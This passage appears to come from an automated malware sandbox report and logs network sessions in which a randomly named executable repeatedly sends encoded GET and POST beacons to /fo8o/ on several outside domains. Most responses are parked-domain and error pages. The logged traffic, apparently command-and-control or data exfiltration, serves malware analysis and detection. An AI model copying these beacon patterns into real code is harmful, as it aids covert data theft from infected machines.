                                          Data Ascii: elJtehkH=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.44974985.159.66.93803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:52.498574018 CEST508OUTGET /fo8o/?elJtehkH=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.magmadokum.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:41:53.215025902 CEST194INHTTP/1.0 504 Gateway Time-out
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.44975091.195.240.94803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:41:58.262658119 CEST782OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.rssnewscast.com
                                          Origin: http://www.rssnewscast.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.rssnewscast.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                          Data Ascii: elJtehkH=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                          Aug 30, 2024 09:41:58.895519018 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Fri, 30 Aug 2024 07:41:58 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.44975191.195.240.94803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:00.795259953 CEST802OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.rssnewscast.com
                                          Origin: http://www.rssnewscast.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.rssnewscast.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                          Data Ascii: elJtehkH=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                          Aug 30, 2024 09:42:02.036525011 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Fri, 30 Aug 2024 07:42:01 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                          Aug 30, 2024 09:42:02.036832094 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Fri, 30 Aug 2024 07:42:01 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.44975291.195.240.94803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:03.337584019 CEST10884OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.rssnewscast.com
                                          Origin: http://www.rssnewscast.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.rssnewscast.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 [TRUNCATED]
                                          Data Ascii: elJtehkH=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA [TRUNCATED]
                                          Aug 30, 2024 09:42:03.974976063 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Fri, 30 Aug 2024 07:42:03 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.44975391.195.240.94803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:05.874682903 CEST509OUTGET /fo8o/?elJtehkH=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.rssnewscast.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:42:06.562836885 CEST1236INHTTP/1.1 200 OK
                                          date: Fri, 30 Aug 2024 07:42:06 GMT
                                          content-type: text/html; charset=UTF-8
                                          transfer-encoding: chunked
                                          vary: Accept-Encoding
                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          pragma: no-cache
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_OO+uFz6o+h7SW/VOmAVybmlqkFLCE9wutgpstRV7Umf9unB4i9wSAKAyf/9j1TmUs7tRGPb4fOKwt6Pn3HdVcA==
                                          last-modified: Fri, 30 Aug 2024 07:42:06 GMT
                                          x-cache-miss-from: parking-fb7ffd9b7-5rd6c
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4f 4f 2b 75 46 7a 36 6f 2b 68 37 53 57 2f 56 4f 6d 41 56 79 62 6d 6c 71 6b 46 4c 43 45 39 77 75 74 67 70 73 74 52 56 37 55 6d 66 39 75 6e 42 34 69 39 77 53 41 4b 41 79 66 2f 39 6a 31 54 6d 55 73 37 74 52 47 50 62 34 66 4f 4b 77 74 36 50 6e 33 48 64 56 63 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                          Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_OO+uFz6o+h7SW/VOmAVybmlqkFLCE9wutgpstRV7Umf9unB4i9wSAKAyf/9j1TmUs7tRGPb4fOKwt6Pn3HdVcA==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                          Aug 30, 2024 09:42:06.562870979 CEST1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                          Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1088ng for!"><link rel="icon" type="image/png" href="//img.
                                          Aug 30, 2024 09:42:06.562885046 CEST448INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                          Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                          Aug 30, 2024 09:42:06.562896967 CEST1236INData Raw: 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65
                                          Data Ascii: earance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[
                                          Aug 30, 2024 09:42:06.562908888 CEST1236INData Raw: 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e
                                          Data Ascii: content{color:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}.container-content__container-re
